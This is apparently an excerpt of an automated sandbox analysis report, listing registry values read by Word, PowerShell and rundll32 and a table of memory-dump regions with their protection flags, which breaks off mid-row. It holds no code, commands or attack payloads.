C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F4A59
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F4A59
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\system32\qagentrt.dll,-10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 336 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
220000
|
unkown
|
page execute and read and write
|
||
320000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
2F0000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
720000
|
unkown image
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
3A0000
|
unkown
|
page execute and read and write
|
||
280000
|
unkown image
|
page execute and read and write
|
||
870000
|
unkown image
|
page execute and read and write
|
||
370000
|
unkown
|
page execute and read and write
|
||
2F0000
|
unkown
|
page execute and read and write
|
||
2D0000
|
unkown image
|
page execute and read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
480000
|
heap default
|
page read and write
|
||
2E99000
|
unkown
|
page read and write
|
||
464000
|
unkown image
|
page read and write
|
||
390000
|
heap private
|
page read and write
|
||
423000
|
unkown image
|
page execute read
|
||
3D0000
|
heap private
|
page read and write
|
||
1F0000
|
unkown
|
page readonly
|
||
2EFC000
|
unkown
|
page read and write
|
||
1CB7E000
|
unkown
|
page read and write
|
||
1BC000
|
stack
|
page read and write
|
||
35BF000
|
unkown
|
page read and write
|
||
420000
|
unkown image
|
page execute and read and write
|
||
3487000
|
unkown
|
page read and write
|
||
870000
|
heap private
|
page read and write
|
||
35C2000
|
unkown
|
page read and write
|
||
BB0000
|
heap private
|
page read and write
|
||
2574000
|
heap private
|
page read and write
|
||
2EF3000
|
unkown
|
page read and write
|
||
534000
|
heap default
|
page read and write
|
||
2F85000
|
unkown
|
page read and write
|
||
3F0000
|
heap private
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
7FF0004C000
|
unkown
|
page execute and read and write
|
||
1BE0000
|
unkown
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
2385000
|
unkown
|
page read and write
|
||
2F7C000
|
unkown
|
page read and write
|
||
43F000
|
stack
|
page read and write
|
||
2CE0000
|
heap private
|
page read and write
|
||
276000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
1DC7000
|
unkown
|
page readonly
|
||
2F20000
|
unkown
|
page read and write
|
||
1CBB3000
|
heap private
|
page read and write
|
||
287F000
|
unkown
|
page read and write
|
||
4B9000
|
unkown
|
page read and write
|
||
7A7000
|
heap default
|
page read and write
|
||
2570000
|
unkown
|
page readonly
|
||
276000
|
unkown
|
page read and write
|
||
2E4000
|
unkown image
|
page read and write
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
22A0000
|
unkown
|
page read and write
|
||
423000
|
unkown image
|
page execute read
|
||
440000
|
unkown
|
page readonly
|
||
12C05000
|
unkown
|
page read and write
|
||
3149000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
200000
|
unkown
|
page read and write
|
||
2312000
|
heap private
|
page read and write
|
||
2DAD000
|
stack
|
page read and write
|
||
9E0000
|
heap private
|
page read and write
|
||
547000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
AB0000
|
heap private
|
page read and write
|
||
3554000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2F4D000
|
unkown
|
page read and write
|
||
390000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
7FF00040000
|
unkown
|
page read and write
|
||
742000
|
unkown image
|
page execute and read and write
|
||
30D6000
|
unkown
|
page read and write
|
||
2592000
|
heap private
|
page read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
420000
|
unkown
|
page read and write
|
||
4D4000
|
heap default
|
page read and write
|
||
2E30000
|
unkown
|
page read and write
|
||
78A000
|
unkown image
|
page readonly
|
||
E68000
|
heap private
|
page read and write
|
||
1F10000
